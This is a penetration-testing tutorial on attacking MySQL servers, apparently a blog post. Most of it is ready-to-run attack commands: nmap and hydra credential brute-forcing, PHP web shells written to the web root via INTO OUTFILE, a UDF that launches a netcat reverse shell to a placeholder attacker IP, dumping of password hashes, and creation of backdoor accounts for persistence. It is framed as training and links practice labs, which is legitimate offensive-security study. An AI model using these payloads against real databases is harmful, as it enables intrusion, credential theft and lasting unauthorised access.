Breaking into MySQL:
MySQL is one of the most popular relational databases in the world—and often overlooked as a foothold during penetration tests. With poor configurations, weak credentials, and overly permissive access, MySQL can go from backend database to full system compromise.
Let’s walk through how to discover, enumerate, exploit, and post-exploit MySQL like a true offensive operator.
1. What is MySQL?
MySQL is an open-source relational database management system (RDBMS) that uses SQL (Structured Query Language) for managing data. It’s commonly used in web applications and can be a gateway to sensitive user data, internal logic, and sometimes even system shells.
🔑 Key Details:
- Default Port: 3306 (TCP)
- Auth Methods: Username + password (local or remote)
- Common Weaknesses:
- Default credentials (root:root, root:mysql)
- Remote root login enabled
- SQL Injection leading to credential extraction
- File read/write from within SQL queries
- Privilege escalation via UDFs or OS interaction
2. Scanning for MySQL
Nmap
nmap -p 3306 -sV <target>
Nmap Script Scan
nmap -p 3306 --script mysql-info,mysql-users,mysql-databases,mysql-empty-password,mysql-brute <target>
mysql-info: Gets MySQL server version and protocol details.mysql-empty-password: Tests for empty passwords.mysql-brute: Performs a dictionary attack.mysql-users: Enumerates valid usernames (if allowed).mysql-databases: Tries to list databases (rare unless anonymous or creds are known).
3. MySQL Enumeration
Using Metasploit
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login
Login scanner helps validate user/pass combos:
set USERNAME root
set PASSWORD root
set RHOSTS <target>
run
Using mysql CLI
mysql -h <target> -u root -p
If successful, enumerate:
SHOW DATABASES;
SELECT user, host, authentication_string FROM mysql.user;
Using hydra
hydra -L users.txt -P passwords.txt -s 3306 <target> mysql
4. Exploiting MySQL
Let’s weaponize access.
Default or Weak Credentials
Still common in dev/staging environments:
mysql -h <target> -u root -p
Try no password first.
SQL Injection → MySQL Access
If a web app uses MySQL and is vulnerable to SQLi:
- Extract usernames/hashes
- Write files to disk via:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
File Read/Write (With FILE Privilege)
If you can log in and have FILE privileges:
SELECT LOAD_FILE('/etc/passwd');
Or drop a web shell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/backdoor.php';
User-Defined Functions (UDF) for RCE
If you can write to plugin directories and have root MySQL:
- Upload a malicious
.sofile (Linux) or.dll(Windows) - Load as a UDF:
CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT do_system('nc -e /bin/bash <attacker-ip> <port>');
Escaping the Database
- Check for
rootaccess inside MySQL:
SELECT user(), current_user(), version();
- If you can
!execute shell commands (older/rare), it’s over.
5. Post-Exploitation
Data Exfiltration
- Dump all users and hashes:
SELECT user, host, authentication_string FROM mysql.user;
- Dump tables:
USE <database>;
SHOW TABLES;
SELECT * FROM <table>;
Privilege Escalation
- Check for stored procedures with dangerous functionality
- Abuse
GRANTprivileges to create more users:
GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'hackme' WITH GRANT OPTION;
Persistence
- Create a user with remote access from anywhere:
CREATE USER 'evil'@'%' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON *.* TO 'evil'@'%';
- Set up triggers or scheduled events to reinfect if cleaned
Clean Up
- Remove any files dropped (e.g., shells, UDFs)
- Drop any backdoor users or procedures
TryHackMe Rooms to Practice MySQL Attacks
- Injection – Great for SQLi basics that lead into DB access
- Relevant – Has a MySQL privilege escalation vector
- Mr Robot – Data dumping after web exploitation
Final Thoughts
MySQL isn’t just a backend—it can be a wide-open gateway into the system. With access, you’re often just one clever query away from file access, shell, or full system takeover. If you spot port 3306, treat it with curiosity and caution—especially if you’re facing a misconfigured root login.